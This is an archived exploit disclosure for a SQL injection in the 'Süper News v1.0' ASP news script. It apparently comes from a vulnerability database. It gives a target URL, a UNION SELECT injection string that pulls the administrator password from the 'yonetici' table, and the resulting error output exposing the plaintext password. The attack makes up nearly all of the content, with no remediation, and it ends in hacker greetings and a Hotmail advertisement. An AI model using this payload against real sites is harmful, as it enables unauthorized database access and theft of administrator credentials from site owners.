Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19692
HistoryApr 20, 2008 - 12:00 a.m.

Süper News v1.0 Remote SQL Injection Vulnerability

2008-04-2000:00:00
vulners.com
22

My Bug Formate .txt Link : http://www.turkishfrm.com/news/daa.txt

By bug :

############################################################

Title : Süper News v1.0 Remote SQL Injection Vulnerability

AuthoR : Cilgin_HaCKer ( cen0x ) ~ [email protected]

WebSite : http://cilginizm.ch

Download : http://www.aspturkiye.com/detay.asp?fldAuto=796

############################################################

Expl0it :

http://n3w5.somee.com/detay.asp?id=[SqLC0de]

SqL C0de :

-99%20union+all+select+0,1,2,3,4,5,sifre+from+yonetici

############################################################

Administrator's password is in error :

Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "deneme123"]'

/detay.asp, line 38

Password is there :

[string: "deneme123"]'

Passw0rd : deneme123

############################################################

Thanx : Kerem125 - gsy - Shadowman - ercu_145 - RedRolix ( sari_seytan )

PoLoNia - m0sted - The.Sansar - bY C@GRi - dikey - Felakett

############################################################


Hotmail'i seviyor musunuz? Artık daha da iyi. Sürükle ve Bırak, yeni Okuma Bölmeleri, genişletilmiş
güvenlik özellikleri ve 5GB ÜCRETSİZ depolama alanı hep birlikte sizin çevrimiçi iletişiminizi daha da
kolaylaştırıyor. Tamamıyla yeni Windows Live Hotmail. Ücretsiz hesabınızı ŞİMDİ edinin!
http://get.live.com/mail/overview/